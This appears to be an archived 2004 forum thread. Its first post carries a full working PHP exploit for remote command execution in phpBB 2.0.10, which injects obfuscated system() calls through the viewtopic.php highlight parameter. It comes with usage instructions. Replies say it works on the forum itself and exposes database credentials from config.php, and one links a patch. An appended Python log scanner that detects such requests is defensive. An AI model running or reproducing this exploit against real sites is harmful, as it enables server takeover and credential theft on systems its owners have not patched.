View Full Version : phpBB 2.0.10 execute command Exploits


firewall
26-11-2004, 04:55 PM
Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code.


#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;

if ($argv[4])
$proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>

--- Don't ask how to use it..... ;) ----

it_waaznt_me
26-11-2004, 11:55 PM
Ha Ha ha ...

go4inet
27-11-2004, 01:33 PM
lol @ you guys, when you run those exploits, you can see the dbname, dbadmin, dbhost from config.php file!

I don't think this is allowed here? Batty?

flashweb
27-11-2004, 11:50 PM
Yes, the exploit is valid for this forum :-)

But here the forum runs as nobody. Still, it will show the content of PHP files, directory listings etc... If you run the forum as a privileged user (phpsuexec), anyone can hack the web site. It is very easy to patch this exploit:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

go4inet
28-11-2004, 07:38 AM
I am waiting for digit forum to update with v2.0.11! Guess that's the latest version!
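
A defender-side check for the request shape in the first post, as an added example that is not part of the thread: it scans web-server access log lines for viewtopic.php requests whose highlight parameter is percent-encoded more than once (the %2527 and %252e sequences in the posted URL) or decodes to PHP metacharacters. The log lines, function names and the metacharacter heuristic are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic (assumption): quotes, backticks, backslashes, '$' and call syntax
# have no business in a search-highlight term.
SUSPICIOUS_RE = re.compile(r"""['"`\\$]|\w\s*\(""")

# Constructed sample access-log lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Nov/2004:16:55:01 +0000] "GET /forum/viewtopic.php?t=1&highlight=php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Nov/2004:17:02:13 +0000] "GET /forum/viewtopic.php?t=1&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.1" 200 7301',
    '192.0.2.10 - - [26/Nov/2004:17:05:40 +0000] "GET /forum/viewtopic.php?t=7&highlight=foo%20bar HTTP/1.1" 200 4988',
    '192.0.2.51 - - [26/Nov/2004:17:09:02 +0000] "GET /forum/index.php?highlight=%2527 HTTP/1.1" 200 3010',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def check_line(line):
    """Return (reasons, decoded highlight) for a flagged line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("viewtopic.php"):
        return None
    for pair in target.query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote(key).lower() != "highlight":
            continue
        decoded, rounds = fully_decode(raw)
        reasons = ["multi-encoded"] if rounds >= 2 else []
        if SUSPICIOUS_RE.search(decoded):
            reasons.append("php-metachar")
        if reasons:
            return reasons, decoded
    return None

def scan(lines):
    """Map 1-based line number -> (reasons, decoded value) for flagged lines."""
    hits = {n: check_line(line) for n, line in enumerate(lines, 1)}
    return {n: hit for n, hit in hits.items() if hit}

if __name__ == "__main__":
    for n, (reasons, decoded) in scan(SAMPLE_LOG).items():
        print(f"line {n}: {','.join(reasons)}: {decoded!r}")
```

Decoding to a fixed point matters here because a filter that decodes the parameter only once still sees harmless-looking %27 and %2e sequences.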